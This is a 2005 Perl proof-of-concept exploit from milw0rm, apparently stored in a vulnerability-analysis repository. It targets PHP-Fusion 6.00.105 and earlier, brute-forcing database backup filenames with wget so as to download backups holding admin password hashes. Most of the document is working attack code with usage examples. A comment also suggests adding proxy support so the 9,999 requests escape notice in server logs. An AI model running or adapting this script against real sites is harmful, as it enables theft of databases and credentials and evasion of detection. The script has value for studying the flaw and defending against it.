lilbool/vuln-code-analysis
0
1 #!/usr/bin/perl
2 ######################################################
3 # D A R K A S S A S S I N S C R E W 2 0 0 5 #
4 ######################################################
5 # Dark Assassins - http://dark-assassins.com/ #
6 # Visit us on IRC @ irc.tddirc.net #DarkAssassins #
7 ######################################################
8 # phpfusiondb.pl; Version 0.1 22/06/05 #
9 # PHP-Fusion db backup proof-of-concept by Easyex #
10 # Database backup vuln in v6.00.105 and below #
11 ######################################################
12 # Description: When a db (database) backup is made #
13 # it is saved in /administration/db_backups/ on 6.0 #
14 # and on 5.0 it is saved in /fusion_admin/db_backups/#
15 # The backup file can be saved in 2 formats: .sql or #
16 # .sql.gz and is hidden by a blank index.php file but#
17 # can be downloaded client-side, The filename is for #
18 # example : backup_2005-06-22_2208.sql.gz so what we #
19 # can do is generate 0001 to 9999 and request the #
20 # file and download it. If a db file is found an #
21 # attacker can get the admin hash and crack it or #
22 # retrieve other sensitive information from the db! #
23 ######################################################
24
25 # 9999 requests to the host is alot, And would get noticed in the server log!
26 # If you re-coded your own script with proxy support you would be fine.
27 # You need to know the backup year-month-day to be able to find a backup file unless the server is set to automaticlly
28 # backup the php-fusiondatabase.
29
30 my $wget='wget';
31
32 my $count='0';
33
34 my $target;
35
36 if (@ARGV < 4)
37{
38 print "\n";
39 print "Welcome to the PHP-Fusion db backup vulnerability\n";
40 print "Coded by Easyex from the Dark Assassins crew\n";
41 print "\n";
42 print "Usage: phpfusiondb.pl <host> <version> <file> <extension>\n";
43 print "Example: phpfusiondb.pl example.com 6 backup_2005-06-23_ .sql.gz\n";
44 print "\n";
45 exit();
46}
47
48 my $host = $ARGV[0];
49 my $ver = $ARGV[1];
50 my $file = $ARGV[2];
51 my $extension = $ARGV[3];
52
53 if ($ver eq "6") {
54 $dir='/administration/db_backups/'; # Directory path to the 6.X backup folder
55 }
56
57 if ($ver eq "5") {
58 $dir='/fusion_admin/db_backups/'; # Directory path to the 5.X backup folder
59}
60
61 print "\n";
62 print "Welcome to the PHP-Fusion db backup vulnerability\n";
63 print "Coded by Easyex from the Dark Assassins crew\n";
64 print "\n";
65
66 print "Host: $host\n";
67 print "Directory: $dir\n";
68 print "File: $file + 0001 to 9999\n";
69 print "Extension: $extension\n";
70 print "\n";
71 print "Attempting to find a db backup file on $host\n";
72
73 for($count=0;$count<9999;$count++) {
74
75 $target=$host.$dir.$file.sprintf("%04d", $count).$extension;
76
77 system("$wget $target");
78 }
79
80# milw0rm.com [2005-06-25]